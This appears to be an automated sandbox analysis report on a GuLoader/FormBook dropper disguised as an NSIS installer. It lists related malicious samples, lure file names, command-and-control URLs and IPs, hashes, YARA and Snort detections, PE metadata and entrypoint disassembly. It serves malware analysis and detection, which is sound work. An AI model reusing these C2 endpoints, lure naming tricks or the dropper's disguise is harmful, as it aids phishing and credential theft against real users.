	t.exe	Get hash	malicious	FormBook	Browse	www.twitter-supporting.net/niku/?xH=WHAh6h1XT&NPUh=S3WUl7FGHgu56hx0EdIdld6ZyB+kQwlHiNeGbakwb/9uwG6U35IjAs3A1ur0zjA0NMd6eb1pdpYaz0Ox7tCELpygUsx9otrsvg==
	Secpralpro Order Q3 FTD52535345675 .vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.investcorpshareholders.com/de15/
	PO3117_002422.exe	Get hash	malicious	FormBook	Browse	www.flowersfoodsbrands.net/df48/?j48hsxg=rA7prPO3NTn8CCJvbgDW89prWmzjw2xlnlAIsScLk4Iq/hJbuTJFWXsUji4hianeBwm+&4hu8g2=Mzrp9Zcpj6kdyNg
	Documents KMTCMAA0290019 ( CI+PL+BL).vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.investcorpshareholders.com/de15/
	triage_dropped_file.exe	Get hash	malicious	FormBook	Browse	www.ihateinvestcorp.com/pogm/?Z2ML=kjVJioZusabqYgqS5fweW8BdtZ0vH8Gc9qgAI0a0OmIBmxDoyeD0Y7sFLYuxYsryonJl&l8UD=tRwXxlthJ
	expiro2.exe	Get hash	malicious	Unknown	Browse	myups.biz/embnp
	aK2aG8PTIE.exe	Get hash	malicious	Unknown	Browse	myups.biz/lihtafwehlf
	New Order Specifications Pdf.exe	Get hash	malicious	FormBook	Browse	www.groupebpcenatixis.com/ssee/?T2J4=bcIVVn/j1oBRXO7GPk+s9Mbw9YI4b6p4YLdBLVuFwprn7evBahWgGECU4sWd6JxEz5G1nhf+eg==&SL34w=4hQhZxth7lKDxDSP
	RFQ, Scope of Requirements PDF.exe	Get hash	malicious	FormBook	Browse	www.groupebpcenatixis.com/ssee/?ZRqLPd=7nE0dtjpKd7&c6A8szA=bcIVVn/j1oBRXO7GPk+s9Mbw9YI4b6p4YLdBLVuFwprn7evBahWgGECU4v6n5Id/wOnk
	TSPO0001978-xlxs.exe	Get hash	malicious	FormBook	Browse	www.titanbrewkit.com/uwec/?-ZVd=1bgta&T8VxaVs=p7PdgcdpxPG2i8UbuhA+BxItYpfZSku0yzpIco0qyVBDEzIuen1WLKJvjmf7YTM4RZX4
	Gv8Zd3cf8H.exe	Get hash	malicious	FormBook	Browse	www.pushcancertothetest.com/3ueg/?v6=K6qH4fi96EEHh+E7kjX5ylpT/5c2YiL0TrvaB308wB06aN4xqVMWjhqEbSTMWowHIDP/ujNBCw==&mt=V6AHdRq0
	xNMNzWxq6v.exe	Get hash	malicious	FormBook	Browse	www.canvas-utrecht.com/mjs/?Sb=Mh_TZvuHY&XB64XvUH=Wc6BgtbwcgFEeIWxcJFzTEgppW3pEYlSFAQc+2l1ZBy8W/Dm20Vqaz3e3u08glKtNjnr
	microsoft.exe	Get hash	malicious	FormBook GuLoader	Browse	www.transunionsucks.com/d2w/?4hLpH4=CPN44o67eahAEmS1z+PXycsvlS2bkGAQYceokC4yvDs6FWTInDJ1X9+EK84T2U0iUPYhD8JCVQ==&GhlpdH=xPGt_6qx
	http://mgglobalbach.com/jh/?opt=1358D73044&1358D73044=1358D730441358D73044&email=h0649-fo2@accor.com&1358D730441358D73044=1358D730441358D73044	Get hash	malicious	Unknown	Browse	accor.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ext-sq.squarespace.com	https://www.armadillo-orchid-mwg3.org/	Get hash	malicious	Unknown	Browse	198.185.159.144
	https://www.mentry-ren3547-y36v5.org/	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	s0ykrDTk89.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://www.flutterwaver.org/	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	https://rolling-stone.org	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	https://www.asbestect.com/	Get hash	malicious	Unknown	Browse	198.185.159.144
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.capaucek.com%2f&c=E,1,T73rDRqVhzsB99jPa24gddUc4JysGPNXdQDX9OdXzlek9-uhe1EAfi1KIVusBTIK9zDbGk405f4SsOAGzzADLNfpIzCve_FKdI32F8biW6zB4A,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	Ad82FERt9X.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.185.159.144
	FT_20230702_230K.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	http://behavioralmedicinespecialists.com	Get hash	malicious	Unknown	Browse	198.185.159.144
	BVYzW8RyuH.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	Novo PDF de Solicita#U00e7#U00e3o de Cota#U00e7#U00e3o.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://www.spcaesquare.com/	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	https://www.spcaesquare.com/	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	https://www.spcaesquare.com/	Get hash	malicious	HTMLPhisher	Browse	198.185.159.144
	Confirm!!.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	New Project_KSA RFQ #877985TT_BGG MG.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	e-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.185.159.144
	DR-1032Y670.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.185.159.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CSCUS	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	128.114.45.223
	31saH6ygm7.exe	Get hash	malicious	Unknown	Browse	165.160.15.20
	MZykmSpz4e.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.160.15.20
	aaYFJC4N64.exe	Get hash	malicious	FormBook	Browse	165.160.13.20
	o0G3mAJ7Ud.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.160.15.20
	OFFER REQUEST-73642.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.160.15.20
	E-DEKONT#22022023.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.160.13.20
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.160.13.20
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse	165.160.13.20
	DETALLES-85552475.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.0.0
	NOTICE-1011.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.2.0
	PO000875438.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.0.0
	DATA_07112022.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.2.0
	6012.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.3.0
	payments_03-11-2022_1611_from_Hotmail.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.2.0
	Rechnung 2022.02.11_1233.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.2.0
	6GnkK3BQ8fkvqvsFr3.dll	Get hash	malicious	Emotet	Browse	128.114.0.0
	Info 0211.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	128.114.2.0
	DOC20221011567890987655600000.exe	Get hash	malicious	FormBook	Browse	165.160.15.20
	p4KGGui30I.exe	Get hash	malicious	FormBook	Browse	165.160.13.20
SPD-NETTR	BWZO7XE4UX.elf	Get hash	malicious	Mirai, Moobot	Browse	85.153.45.221
	j4NM8IfgsU.exe	Get hash	malicious	Raccoon Stealer v2	Browse	195.133.40.111
	DyVFkJ7f7e.exe	Get hash	malicious	Raccoon Stealer v2	Browse	195.133.40.111
	XPKzz1j2S2.elf	Get hash	malicious	Unknown	Browse	195.133.40.45
	asdasd.x86.elf	Get hash	malicious	Unknown	Browse	195.133.40.45
	cotizaci#U00f3n.vbs	Get hash	malicious	Snake Keylogger	Browse	195.133.40.130
	niggabox	Get hash	malicious	Unknown	Browse	195.133.40.189
	BUKKKSKS.vbs	Get hash	malicious	Snake Keylogger	Browse	195.133.40.130
	file.exe	Get hash	malicious	Fabookie, ManusCrypt, Nymaim, RHADAMANTHYS, RedLine, Socelars, Vidar	Browse	212.193.30.32
	89468038.EXE.exe	Get hash	malicious	NetWire	Browse	212.193.30.230
	file.exe	Get hash	malicious	ManusCrypt, Nymaim, RHADAMANTHYS, Socelars, lgoogLoader	Browse	212.193.30.32
	PROMOTION TARIFAIRE.exe	Get hash	malicious	Nanocore	Browse	212.193.30.230
	046390359278.pdf.exe	Get hash	malicious	Nanocore	Browse	212.193.30.230
	vsKxNLA63X.exe	Get hash	malicious	AveMaria	Browse	195.133.40.92
	wXymNI41jH.exe	Get hash	malicious	AveMaria	Browse	195.133.40.92
	fJCb1phrai.exe	Get hash	malicious	AveMaria	Browse	195.133.40.92
	RFQ 2802.xls	Get hash	malicious	Lokibot	Browse	195.133.40.108
	Bank Payment Slip.xls	Get hash	malicious	AveMaria	Browse	195.133.40.92
	66BF743BABAD7405D2426B25BF8D1BB493F6D9048B55E.exe	Get hash	malicious	Raccoon Stealer v2, RedLine, SmokeLoader, Socelars, onlyLogger	Browse	212.193.30.115
	wFDw6h9bCZ.exe	Get hash	malicious	AveMaria	Browse	195.133.40.92

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll	file.exe	Get hash	malicious	Fabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, Socelars, lgoogLoader	Browse
	file.exe	Get hash	malicious	Fabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, RedLine, Socelars	Browse
	vWWBb6OiKq.exe	Get hash	malicious	Fabookie, ManusCrypt, Nymaim, RHADAMANTHYS, Socelars, lgoogLoader	Browse
	PO 2300479-MEDPHARM.exe	Get hash	malicious	FormBook, GuLoader	Browse
	MCME PO - 5700303364.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	PO 2300479-MEDPHARM.exe	Get hash	malicious	GuLoader	Browse
	MCME PO - 5700303364.exe	Get hash	malicious	GuLoader	Browse
	jpmm-desktop-external-installer.exe	Get hash	malicious		Browse
	VisualBeeInstall.exe	Get hash	malicious		Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam

Download File

Process:	C:\Users\user\Desktop\SC.028UCCP.exe
File Type:	data
Category:	dropped
Size (bytes):	268768
Entropy (8bit):	7.143396451103385
Encrypted:	false
SSDEEP:	6144:qJAA/mPgVn081S1KOqpIrh02aq18CUcmQd:TA/moVw1HP02J8CUcVd
MD5:	C6AF2E59D4C09946D5F809241D770F50
SHA1:	266B1073C52D94E9451AA08B2605F2237E5F8A0C
SHA-256:	89E42F99BB457998B2FA3A4D0973ABFE9A39163227F56C8D000CCE44F1EF0070
SHA-512:	B005D4324152790A8BDAAAEE6272A899639FF8D5E1E1FFE1E1219C569F9D271C4A21440F709CA3693A5F80A664501D3AB79EBA81B5B9D07C8870FE5AC15D5124
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, Author: Joe Security
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\ArtDeco_green_7.bmp

Download File

Process:	C:\Users\user\Desktop\SC.028UCCP.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, components 3
Category:	dropped
Size (bytes):	5717
Entropy (8bit):	7.862470085974542
Encrypted:	false
SSDEEP:	96:BSTzREom7JPxQ7OTst5UcVq9JD6EgZEoW249KONYq9iwry9t1Bs6UQJaE424CZ:oXRgtPEOa6+q65Zr87YXwry9tzuCZ
MD5:	B182207A878FA708746DA5A94F08A581
SHA1:	4EF329C2643A9B5E19F491D644A96EF3E7388BE6
SHA-256:	40125E69AA66C655FA44F83BBDEB7E9F24FE81D69CC717651A42C908483FF687
SHA-512:	2368E6533A4D660C08C6F196F38CE2F706C8486AA9E5B1C2413988251184D6A928A348E74DDF0FB098F928D7FCFA4DD71829766E1964E3E5085D642497D034B4
Malicious:	false
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......9o.^....3N>-.~..-......j.\|w.Vu..n..N...#...c......a...M.$......n:..m....?..z..1...^_.1.iE..]O.9..\|.6.b.E.vVF..h6.i.=\|...~.....H.\|.^.U.W.@6..}vz..^ON+....M......{......2OZ..=..@w,..c#..`s.A>....O.<.iw9Y....V...Qx_...@6..';Bg.;...J~...2.#.........~.2:..#..0k.6.K...[k.V....>c.98.-..=..Z&...W.:......

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\Patronymens.Hov230

Download File

Process:	C:\Users\user\Desktop\SC.028UCCP.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	42868
Entropy (8bit):	4.531239376712852
Encrypted:	false
SSDEEP:	768:BmzeD2YSUGt8UN3/hCwqfWCixEmPmXZNIYmhaspQZV:BF9SfyUNvrxEmMAHpQT
MD5:	545F37C048EB23C04FF82F592FB89DEB
SHA1:	9ED7C0D724A7A1C7E38F2A5134D1325B49FCCF25
SHA-256:	DA3CADFEE6D3939C607B6F60B12861931ABD8E7441A2C148C396A38957C7D4DF
SHA-512:	0EB46B15043855818821DD3C60A491E83DF943A30E3BC57E9D37F81AAFF697DFFEF94CE8874A1F61E1E93B7BA2FD740E4FAF7E267BFB1B5B708F1979ED292655
Malicious:	false
Preview:	........zz.......++..........^^^...............l....................."".R..............6......cccccc.B.....(..}}....>>>>>.B.?.C..J.O..yy.....C.....!!..MMMM........pp.......................P...'................g.CC...ww........K.......9.;;....X.........W.....6.....%.........+.........ll..........@..CCCC...0.555................R.......iiii...333.....g..WWW........M...........................D.r..............................A.L.[..........5..,........P..X.....................kkkkk...................w............VVVV.......?...........................+...................................gggg.$.......DDDD.??..........m.............................r......`............;.......bb..ZZ.....................z......O...QQ.....!.....................XX......X.........???.>>>.P............L....O.{...............v..........ff.....!!!...K....6........................#....eee...........?......9...........;...........o......``................................kkk..............U...;;;.......$............h....

C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\SC.028UCCP.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.72460245623286
Encrypted:	false
SSDEEP:	96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
MD5:	CF85183B87314359488B850F9E97A698
SHA1:	6B6C790037EEC7EBEA4D05590359CB4473F19AEA
SHA-256:	3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
SHA-512:	FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: vWWBb6OiKq.exe, Detection: malicious, Browse Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse Filename: jpmm-desktop-external-installer.exe, Detection: malicious, Browse Filename: VisualBeeInstall.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...k..Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.920107350850815
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SC.028UCCP.exe
File size:	267392
MD5:	3f8f4a7f43b5627ed45128bb99f0b471
SHA1:	1c1931fe8db9b5df89d39e3121fa72c2a355ded1
SHA256:	0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
SHA512:	800a88ff5985f832c73fbada7fa71175531dbe9bd47a93bc8941817e791d8868cfedd4dad2f82604ce06e1e2136821b963d35e23d580edf2d260475eb213ff6f
SSDEEP:	6144:4auq7FPth0P6iM7EFsjSHR58yQITE1vE1P57hO5FKHJa:HFPr0SirFjC1yP5NO5FKg
TLSH:	AE4412172BE645FFF9D78C72103AEAB3F5BBE6580817144E0B266F7A7D00603092969D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L......Q.................^...........1.......p....@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x40310b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x51E3058F [Sun Jul 14 20:09:51 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b40f29cd171eb54c01b1dd2683c9c26b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	20/08/2022 06:31:00 19/08/2025 06:31:00
Subject Chain	E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
Version:	3
Thumbprint MD5:	82A2F162C13C97C7C5BD9D1EF5E3E352
Thumbprint SHA-1:	0A4EF0B597133BD21B48A5030DE4541818CB48DA
Thumbprint SHA-256:	9B7EDD84EF52310C29E72A78ED7E0EB44C977D6DE7359675C1845C3D1CD29EBC
Serial:	3E36636B7C2A21B05072BFF828C9540A74C9C941

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [0042EC58h], eax
call 00007FC42CBF7708h
mov dword ptr [0042EBA4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428FE0h
call dword ptr [00407164h]
push 00409180h
push 0042E3A0h
call 00007FC42CBF73B2h
call dword ptr [0040711Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007FC42CBF73A0h
push ebx
call dword ptr [00407114h]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EBA0h], eax
mov eax, ebp
jne 00007FC42CBF499Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007FC42CBF6E4Dh
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FC42CBF4A55h
cmp cl, 00000020h
jne 00007FC42CBF4998h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FC42CBF498Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x10b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3fc20	0x1860	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5de8	0x5e00	False	0.6791057180851063	data	6.503326078284377	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12da	0x1400	False	0.4388671875	data	5.095966873256735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c98	0x400	False	0.63671875	data	5.037907617207934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x15000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x44000	0x10b0	0x1200	False	0.3513454861111111	data	4.2798158371727295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x44238	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x445a0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x44888	0x144	data	English	United States
RT_DIALOG	0x449d0	0x13c	data	English	United States
RT_DIALOG	0x44b10	0x100	data	English	United States
RT_DIALOG	0x44c10	0x11c	data	English	United States
RT_DIALOG	0x44d30	0x60	data	English	United States
RT_GROUP_ICON	0x44d90	0x14	data	English	United States
RT_MANIFEST	0x44da8	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20188.114.97.349822802031449 03/20/23-09:10:34.025355	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	188.114.97.3
192.168.11.20142.250.186.5149827802031412 03/20/23-09:11:35.414280	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	142.250.186.51
192.168.11.20104.21.39.11449842802031449 03/20/23-09:15:00.044344	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.11.20	104.21.39.114
192.168.11.20198.185.159.14449830802031412 03/20/23-09:12:15.932254	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.11.20	198.185.159.144
192.168.11.2013.248.157.3249840802031449 03/20/23-09:14:39.545243	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49840	80	192.168.11.20	13.248.157.32
192.168.11.20165.160.15.2049835802031449 03/20/23-09:13:17.988587	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.11.20	165.160.15.20
192.168.11.20198.185.159.14449830802031453 03/20/23-09:12:15.932254	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.11.20	198.185.159.144
192.168.11.2081.17.29.14749823802031412 03/20/23-09:10:54.265433	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	81.17.29.147
192.168.11.20198.185.159.14449830802031449 03/20/23-09:12:15.932254	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.11.20	198.185.159.144
192.168.11.20169.60.232.13949844802031449 03/20/23-09:15:33.016841	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	169.60.232.139
192.168.11.20142.250.186.5149827802031453 03/20/23-09:11:35.414280	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	142.250.186.51
192.168.11.2081.17.29.14749823802031453 03/20/23-09:10:54.265433	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	81.17.29.147
192.168.11.20165.160.15.2049835802031412 03/20/23-09:13:17.988587	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.11.20	165.160.15.20
192.168.11.20104.21.39.11449842802031453 03/20/23-09:15:00.044344	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.11.20	104.21.39.114
192.168.11.20142.250.186.5149827802031449 03/20/23-09:11:35.414280	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	142.250.186.51
